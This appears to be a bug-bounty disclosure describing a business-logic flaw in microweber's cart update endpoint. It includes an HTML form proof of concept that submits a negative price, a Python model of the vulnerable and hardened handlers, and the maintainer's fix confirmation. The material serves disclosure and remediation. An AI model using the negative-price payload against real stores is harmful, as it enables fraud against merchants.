Business Logic Errors in microweber/microweber

Valid

Reported on

Jul 20th 2021


✍️ Description

microweber is vulnerable to a business-logic error in its cart update endpoint (`/api/update_cart`): the `price` field of the request is taken from the client, so a negative product price can be submitted and is applied to the cart.

🕵️‍♂️ Proof of Concept

HTML content:

<form id="form" action="http://localhost/api/update_cart" method="POST" >
  <input type="text" name="for" value="content">
  <input type="text" name="for_id" value="1">
  <input type="text" name="price" value="-100">
  <input type="submit"> 
</form>

  1. Save the above content into an HTML file. The form posts to the cart endpoint with `for_id=1` (the product) and `price=-100`.
  2. Access the app (localhost) and add a product to the cart, so that a cart session exists.
  3. Open the HTML file and click the submit button. The negative price is accepted and $100 is taken off the cart total.

PoC video.
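The following is an added example written for this page, not code from microweber. It models the cart-update logic the report and the maintainer's reply describe (the client-supplied `price` is honoured when the CMS record has no price) next to a hardened handler that resolves the price server-side and refuses products with no valid price, and replays the PoC request against both. The product catalogue, the request dict and the function names are assumptions.

```python
"""Added example (not microweber code): a minimal model of a cart-update
handler, with the flawed price resolution beside a hardened one.
Product catalogue, request shape and function names are assumptions."""

from decimal import Decimal

# Constructed catalogue standing in for the CMS content table.
# Product 1 has no price set, which the maintainer identified as the
# precondition for the bug; product 2 has a normal price.
CATALOG = {
    1: {"title": "unpriced item", "price": None},
    2: {"title": "priced item", "price": Decimal("25.00")},
}


def update_cart_vulnerable(cart, params):
    """Model of the flawed logic: when the CMS has no price, fall back to
    params['price'] with no sign or ownership check. Returns the new total."""
    for_id = int(params["for_id"])
    cms_price = CATALOG[for_id]["price"]
    price = cms_price if cms_price is not None else Decimal(params.get("price", "0"))
    cart.append({"for_id": for_id, "price": price})
    return sum(item["price"] for item in cart)


class CartError(ValueError):
    """Raised when a cart update is rejected."""


def update_cart_hardened(cart, params):
    """Hardened version: the price is always resolved from the catalogue,
    any client-supplied 'price' field is ignored, and a product without a
    non-negative CMS price cannot be added at all. Returns the new total."""
    try:
        for_id = int(params["for_id"])
    except (KeyError, ValueError):
        raise CartError("invalid for_id")
    product = CATALOG.get(for_id)
    if product is None:
        raise CartError("unknown product")
    price = product["price"]
    if price is None or price < 0:
        raise CartError("product has no valid price; refusing to add")
    cart.append({"for_id": for_id, "price": price})
    return sum(item["price"] for item in cart)


# The body posted by the PoC form, as a dict (constructed to match it).
POC_PARAMS = {"for": "content", "for_id": "1", "price": "-100"}


def run_poc(handler):
    """Add the priced product first (step 2 of the PoC), then replay the
    PoC request (step 3). Returns the resulting total, or the rejection
    message, so the two handlers can be compared."""
    cart = []
    handler(cart, {"for": "content", "for_id": "2"})
    try:
        return handler(cart, POC_PARAMS)
    except CartError as exc:
        return str(exc)


if __name__ == "__main__":
    # The vulnerable handler ends with a negative cart total; the hardened
    # one rejects the request.
    print("vulnerable total:", run_poc(update_cart_vulnerable))
    print("hardened:", run_poc(update_cart_hardened))
```

The important design point is that the hardened handler never reads `params["price"]` at all: price is a property of the catalogue record, not of the request, and a product the CMS has not priced is treated as unsellable rather than as "price supplied by whoever is checking out".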

💥 Impact

Anyone who can submit the cart update request can set an arbitrary, including negative, price for a cart line, driving the order total down to zero or below. In effect, every product can be obtained for free.

We have contacted a member of the microweber team and are waiting to hear back 2 years ago
Peter Ivanov validated this vulnerability 2 years ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed with commit 76c277 2 years ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
Peter Ivanov, 2 years ago:

hi, thanks for the report,

this issue is happening only on products that do not have a price set in the CMS

now it's fixed
